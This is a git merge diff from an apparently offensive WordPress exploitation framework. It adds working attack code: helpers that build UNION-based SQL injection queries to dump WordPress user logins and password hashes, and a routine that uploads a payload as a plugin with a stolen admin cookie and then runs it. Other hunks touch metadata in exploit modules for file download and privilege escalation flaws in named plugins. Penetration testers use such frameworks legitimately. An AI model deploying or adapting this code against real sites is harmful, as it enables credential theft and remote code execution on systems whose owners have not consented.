Merge branch 'development'

Author: rastating

VERSION

@@ -1 +1 @@
-1.8
+1.8.1

lib/wpxf/wordpress/hash_dump.rb

@@ -29,9 +29,14 @@ def reveals_one_row_per_request
     false
   end
 
+  # @return [Array] an array of values to use in the generated union statement.
+  def hashdump_custom_union_values
+    []
+  end
+
   # @return [String] a unique SQL select statement that can be used to extract the hashes.
   def hashdump_sql_statement
-    cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
+    cols = hashdump_union_cols
     cols[hashdump_visible_field_index] = "concat(#{bof_token},0x3a,user_login,0x3a,user_pass,0x3a,#{eof_token})"
 
     query = "select #{cols.join(',')} from #{table_prefix}users"
@@ -40,9 +45,9 @@ def hashdump_sql_statement
     "#{query} limit #{current_row},1"
   end
 
-  # @return [String] a unique SEL select statement that can be used to fingerprint the database prefix.
+  # @return [String] a unique select statement that can be used to fingerprint the database prefix.
   def hashdump_prefix_fingerprint_statement
-    cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
+    cols = hashdump_union_cols
     cols[hashdump_visible_field_index] = "concat(#{bof_token},0x3a,table_name,0x3a,#{eof_token})"
 
     query = "select #{cols.join(',')} from information_schema.tables where table_schema = database()"
@@ -100,7 +105,7 @@ def run
 
     @current_row = 0
     emit_info 'Dumping user hashes...'
-    hashes = dump_and_parse_hashes
+    hashes = dump_and_parse_hashes.uniq
     output_hashdump_table(hashes)
 
     export_hashes(hashes) if export_path
@@ -109,6 +114,16 @@ def run
 
   private
 
+  def hashdump_union_cols
+    cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
+
+    hashdump_custom_union_values.each_with_index do |value, index|
+      cols[index] = value unless value.nil?
+    end
+
+    cols
+  end
+
   def bof_token
     @bof_token
   end

lib/wpxf/wordpress/plugin.rb

@@ -7,9 +7,12 @@ module Wpxf::WordPress::Plugin
   # @return [String, nil] the nonce, nil on error.
   def wordpress_plugin_upload_nonce(cookie)
     res = execute_get_request(url: wordpress_url_plugin_upload, cookie: cookie)
-    if res && res.code == 200
+
+    if res&.code == 200
       return res.body[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
     end
+
+    nil
   end
 
   # Create and upload a plugin that encapsulates the current payload.
@@ -22,11 +25,29 @@ def wordpress_upload_payload_plugin(name, payload_name, cookie)
     return false if nonce.nil?
 
     res = wordpress_upload_plugin(name, payload_name, cookie, nonce)
-    if res && res.code == 200
-      return true
-    else
-      return false
+    res&.code == 200
+  end
+
+  # Upload and execute a payload as a plugin.
+  # @param plugin_name [String] the name of the plugin.
+  # @param payload_name [String] the name the payload should use on the server.
+  # @param cookie [String] a valid admin session cookie.
+  # @return [HttpResponse, nil] the {Wpxf::Net::HttpResponse} of the request.
+  def wordpress_upload_and_execute_payload_plugin(plugin_name, payload_name, cookie)
+    unless wordpress_upload_payload_plugin(plugin_name, payload_name, cookie)
+      emit_error 'Failed to upload the payload'
+      return nil
     end
+
+    payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
+    emit_info "Executing the payload at #{payload_url}..."
+    res = execute_get_request(url: payload_url)
+
+    if res&.code == 200 && !res.body.strip.empty?
+      emit_success "Result: #{res.body}"
+    end
+
+    res
   end
 
   # Generate a valid WordPress plugin header / base file.

lib/wpxf/wordpress/urls.rb

@@ -123,4 +123,9 @@ def wordpress_url_rest_api
   def wordpress_url_comments_post
     normalize_uri(full_uri, 'wp-comments-post.php')
   end
+
+  # @return [String] the admin / plugin options URL.
+  def wordpress_url_admin_options
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
 end

modules/auxiliary/ad_widget_php_file_download.rb

@@ -9,7 +9,7 @@ def initialize
     update_info(
       name: 'Ad-Widget <= 2.11.0 Authenticated PHP File Download',
       author: [
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'rastating' # WPXF module
       ],
       references: [
         ['WPVDB', '8789']

modules/auxiliary/all_in_one_migration_export.rb

@@ -14,8 +14,8 @@ def initialize
         All-in-One Migration plugin in versions < 2.0.5.
       ),
       author: [
-        'James Golovich',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'James Golovich', # Disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '7857'],

modules/auxiliary/antioch_arbitrary_file_download.rb

@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Antioch Theme Arbitrary File Download',
       author: [
-        'Ashiyane Digital Security Team',  # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Ashiyane Digital Security Team', # Disclosure
+        'rastating'                       # WPXF module
       ],
       references: [
         ['WPVDB', '8406']

modules/auxiliary/candidate_application_form_arbitrary_file_download.rb

@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Candidate Application Form Arbitrary File Download',
       author: [
-        'Larry W. Cashdollar',             # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Larry W. Cashdollar', # Disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['EDB', '37754']

modules/auxiliary/cp_image_store_arbitrary_file_download.rb

@@ -14,8 +14,8 @@ def initialize
         file accessible by the user the web server is running as.
       ),
       author: [
-        'Joaquin Ramirez Martinez',        # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Joaquin Ramirez Martinez', # Disclosure
+        'rastating'                 # WPXF module
       ],
       references: [
         ['EDB', '37559']

modules/auxiliary/custom_contact_forms_privilege_escalation.rb

@@ -13,8 +13,8 @@ def initialize
             '5.1.0.3, allows unauthenticated users to create new admin users '\
             'due to lack of validation when uploading SQL files.',
       author: [
-        'Marc-Alexandre Montpas',          # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Marc-Alexandre Montpas', # Vulnerability discovery
+        'rastating'               # WPXF module
       ],
       references: [
         ['URL', 'http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html'],